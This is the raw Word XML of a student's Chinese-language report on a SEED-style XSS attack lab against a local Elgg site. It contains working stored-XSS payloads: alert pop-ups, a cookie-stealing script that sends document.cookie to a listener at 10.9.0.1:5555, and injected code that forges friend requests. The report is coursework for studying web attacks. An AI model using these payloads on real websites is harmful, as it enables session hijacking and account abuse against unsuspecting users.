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887" w14:textId="5C4F6974" w:rsidR="00AE5EF1" w:rsidRPr="00B103CE" w:rsidRDefault="00B103CE" w:rsidP="00B103CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B103CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>五</w:t>
      </w:r>
      <w:r w:rsidRPr="00B103CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5074CD" w14:textId="74AE20CF" w:rsidR="00B103CE" w:rsidRDefault="00B103CE" w:rsidP="00B103CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B103CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实验名称：</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B2D" w:rsidRPr="00DB2B2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581FCBA0" w14:textId="77777777" w:rsidR="005C0C4E" w:rsidRDefault="005C0C4E" w:rsidP="005C0C4E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 xml:space="preserve">基本信息： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D3936A" w14:textId="21A4B542" w:rsidR="005C0C4E" w:rsidRPr="00EE79D7" w:rsidRDefault="005C0C4E" w:rsidP="005C0C4E">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE79D7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姓名：马运聪     学号：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 xml:space="preserve">57119115     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE79D7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完成日期：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>2021</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE79D7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.7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>.</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B2D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00C761F5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCB1EA1" w14:textId="77777777" w:rsidR="005C0C4E" w:rsidRDefault="005C0C4E" w:rsidP="005C0C4E"/>
    <w:p w14:paraId="5D2200EF" w14:textId="08558D00" w:rsidR="00021D08" w:rsidRDefault="005C0C4E" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31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>实验内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D4C39" w14:textId="3C15B489" w:rsidR="007F24E2" w:rsidRPr="00021D08" w:rsidRDefault="00021D08" w:rsidP="005C0C4E">
      <w:pP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:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00021D08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环境配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B75DC" w14:textId="53539C1B" w:rsidR="003577AF" w:rsidRDefault="00503288" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22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2"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00321FDB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>设置DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195BCB97" w14:textId="0EEF5002" w:rsidR="003A1FC2" w:rsidRPr="003A1FC2" w:rsidRDefault="00321FDB" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DDD0498" wp14:editId="7305E09B">
            <wp:extent cx="3873699" cy="15113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AD5" w14:textId="2D7FA47D" w:rsidR="00FF0E94" w:rsidRPr="002C4FB5" w:rsidRDefault="00503288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 w:rsidR="00103BAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>启动Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A32DEBA" w14:textId="58085EC6" w:rsidR="00FF0E94" w:rsidRDefault="009A0F9D" w:rsidP="005C0C4E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5428A9D2" wp14:editId="28995A78">
            <wp:extent cx="5274310" cy="2576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E2C" w14:textId="1E307F91" w:rsidR="00FF0E94" w:rsidRDefault="00FF0E94" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9B2806" w14:textId="23187FF6" w:rsidR="00FE1C29" w:rsidRDefault="00FE1C29" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65525875" w14:textId="1E67395C" w:rsidR="009A0F9D" w:rsidRDefault="009A0F9D" w:rsidP="009A0F9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A0F9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Task 1: Posting a Malicious Message to Display an Alert Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79102F0C" w14:textId="4200AF2B" w:rsidR="009A0F9D" w:rsidRPr="009A0F9D" w:rsidRDefault="00B90FB5" w:rsidP="009A0F9D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009A0F9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00EC0DBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Samy的个人资料description中插入代码“</w:t>
      </w:r>
      <w:r w:rsidR="00EC0DBE" w:rsidRPr="0095592A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:r w:rsidR="00D47274" w:rsidRPr="0095592A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00EC0DBE" w:rsidRPr="0095592A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00D47274" w:rsidRPr="0095592A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00EC0DBE" w:rsidRPr="0095592A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>);&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00EC0DBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，主页结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001EF76D" w14:textId="71DCF700" w:rsidR="00DC073B" w:rsidRDefault="00D47274" w:rsidP="005C0C4E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3C96AE2" wp14:editId="41D46087">
            <wp:extent cx="5274310" cy="23666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AEB0" w14:textId="77777777" w:rsidR="007F06C2" w:rsidRPr="009A0F9D" w:rsidRDefault="007F06C2" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CEBDC0E" w14:textId="77777777" w:rsidR="00D65F63" w:rsidRDefault="00D65F63" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D65F63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Task 2: Posting a Malicious Message to Display Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9A4E5E" w14:textId="615AA29D" w:rsidR="00B90FB5" w:rsidRDefault="00B90FB5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 w:rsidRPr="00B90FB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Samy的个人资料description中插入代码“</w:t>
      </w:r>
      <w:r w:rsidRPr="0095592A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(document.cookie);&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D7FEAC" w14:textId="6D1D5E76" w:rsidR="00E46E89" w:rsidRDefault="00B90FB5" w:rsidP="005C0C4E">
      <w:pPr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rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>添加后，显示Samy自己的cookie。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEA4F6A" w14:textId="68E1E410" w:rsidR="00694ED2" w:rsidRDefault="00B90FB5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4DABB276" wp14:editId="3EB33E85">
            <wp:extent cx="5274310" cy="23399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2A0E" w14:textId="059C3DF8" w:rsidR="00B90FB5" w:rsidRPr="004F65AE" w:rsidRDefault="00B90FB5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当Alice访问Samy主页时，弹窗显示Alice用户的cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51284CC5" w14:textId="511E755E" w:rsidR="003D20A5" w:rsidRPr="004F65AE" w:rsidRDefault="00B90FB5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1889757C" wp14:editId="68A6FA6C">
            <wp:extent cx="5274310" cy="24904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0670" w14:textId="635361EA" w:rsidR="002C4FB5" w:rsidRDefault="002C4FB5" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E04659" w14:textId="77777777" w:rsidR="00B90FB5" w:rsidRPr="00694ED2" w:rsidRDefault="00B90FB5" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1864C0" w14:textId="77777777" w:rsidR="00B90FB5" w:rsidRDefault="00B90FB5" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90FB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3: Stealing Cookies from the Victim’s Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD18D94" w14:textId="0E316B3E" w:rsidR="0095592A" w:rsidRPr="0095592A" w:rsidRDefault="0095592A" w:rsidP="0095592A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0095592A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将Samy的brief</w:t>
      </w:r>
      <w:r w:rsidRPr="0095592A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0095592A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>description</w:t>
      </w:r>
      <w:r w:rsidRPr="0095592A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0095592A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>添加如下代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D7D4CD" w14:textId="19666865" w:rsidR="00503288" w:rsidRPr="0095592A" w:rsidRDefault="0095592A" w:rsidP="0095592A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0095592A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.write(’&lt;img src=http://10.9.0.1:5555?c=’ + escape(document.cookie) + ’ &gt;’); &lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0095592A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C87FE" w14:textId="012DEE2F" w:rsidR="002B0EFB" w:rsidRDefault="002E6713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729A009A" wp14:editId="16FB95FF">
            <wp:extent cx="5274310" cy="4515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22CA" w14:textId="151A2455" w:rsidR="002E6713" w:rsidRDefault="00FB2F8C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则当用户点击Samy主页时，攻击者可以查看到cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB43FA4" w14:textId="77777777" w:rsidR="00FB2F8C" w:rsidRDefault="00FB2F8C" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E808162" w14:textId="055657AF" w:rsidR="002B0EFB" w:rsidRPr="00503288" w:rsidRDefault="002B0EFB" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00503288">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00503288">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ask</w:t>
      </w:r>
      <w:r w:rsidRPr="00503288">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00503288">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00182912" w:rsidRPr="00503288">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enabling Elgg’s Countermeasure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16814AA5" w14:textId="19E2ADBD" w:rsidR="002E6713" w:rsidRPr="002E6713" w:rsidRDefault="002E6713" w:rsidP="002E6713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>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6713">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>获取H</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6713">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TTP</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6713">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>请求，查看_</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6713">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">elgg_ts </w:t>
      </w:r>
      <w:r w:rsidRPr="002E6713">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">和 </w:t>
      </w:r>
      <w:r w:rsidRPr="002E6713">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">_elgg_token </w:t>
      </w:r>
      <w:r w:rsidRPr="002E6713">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>两个参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68915B6B" w14:textId="26421134" w:rsidR="002E6713" w:rsidRPr="002E6713" w:rsidRDefault="002E6713" w:rsidP="002E6713">
      <w:pPr>
        <w:spacing w:line="192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F9AB003" wp14:editId="4D996818">
            <wp:extent cx="5274310" cy="1323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684" w14:textId="0A5DDE20" w:rsidR="002E6713" w:rsidRPr="0043251D" w:rsidRDefault="0043251D" w:rsidP="0043251D">
      <w:pPr>
        <w:spacing w:line="192" w:lineRule="auto"/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 w:rsidRPr="0043251D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>构造添加好友请求。在Samy的个人主页about</w:t>
      </w:r>
      <w:r w:rsidRPr="0043251D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0043251D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>me</w:t>
      </w:r>
      <w:r w:rsidRPr="0043251D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0043251D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注入JavaScript代码</w:t>
      </w:r>
      <w:r w:rsidRPr="0043251D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B7473B" w14:textId="424D1701" w:rsidR="0043251D" w:rsidRDefault="00FB2F8C" w:rsidP="0043251D">
      <w:pPr>
        <w:spacing w:line="192" w:lineRule="auto"/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CA385C" wp14:editId="5E0D60F2">
            <wp:extent cx="5274310" cy="2331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5B34" w14:textId="0555DD48" w:rsidR="00FB2F8C" w:rsidRDefault="00FB2F8C" w:rsidP="0043251D">
      <w:pPr>
        <w:spacing w:line="192" w:lineRule="auto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3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添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JavaScript代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后的Samy的主页如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C32845F" w14:textId="5DA271F5" w:rsidR="0043251D" w:rsidRDefault="00FB2F8C" w:rsidP="0043251D">
      <w:pPr>
        <w:spacing w:line="192" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F6B7528" wp14:editId="40451EF4">
            <wp:extent cx="5274310" cy="2072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B6A5" w14:textId="790C4A9E" w:rsidR="00FB2F8C" w:rsidRDefault="00FB2F8C" w:rsidP="0043251D">
      <w:pPr>
        <w:spacing w:line="192" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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登录Alice账户，此时Alice并没有好友，在member界面打开Samy的主页；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679787CE" w14:textId="6D625639" w:rsidR="00FB2F8C" w:rsidRPr="0043251D" w:rsidRDefault="00FB2F8C" w:rsidP="0043251D">
      <w:pPr>
        <w:spacing w:line="192" w:lineRule="auto"/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7092B739" wp14:editId="5258ECD2">
            <wp:extent cx="5274310" cy="1715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BD99" w14:textId="388228BA" w:rsidR="00AE120C" w:rsidRDefault="00FB2F8C" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2F8C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6643D50A" wp14:editId="3A53AC18">
            <wp:extent cx="5274310" cy="2145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BBF" w14:textId="0B1DA2A3" w:rsidR="00FB2F8C" w:rsidRDefault="00FB2F8C" w:rsidP="005C0C4E">
      <w:pPr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再次查看好友信息，此时已成功添加Samy为好友。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B27582" w14:textId="0AF4FA9F" w:rsidR="0043251D" w:rsidRDefault="00FB2F8C" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2F8C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="194192BF" wp14:editId="5829979F">
            <wp:extent cx="5274310" cy="2350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4A19" w14:textId="79924ACF" w:rsidR="00FB2F8C" w:rsidRDefault="00C50EE2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问题：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338EE395" w14:textId="77777777" w:rsidR="00C50EE2" w:rsidRDefault="00C50EE2" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>uestion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Explain the purpose of Lines À and Á, why are they are needed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4CEB25" w14:textId="5BCDA7E7" w:rsidR="00C50EE2" w:rsidRDefault="00C50EE2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答：行①和行②的作用是从相关的JavaScript变量中获取时间戳和秘密令牌的值，即</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6713">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6713">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">elgg_ts </w:t>
      </w:r>
      <w:r w:rsidRPr="002E6713">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">和 </w:t>
      </w:r>
      <w:r w:rsidRPr="002E6713">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_elgg_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
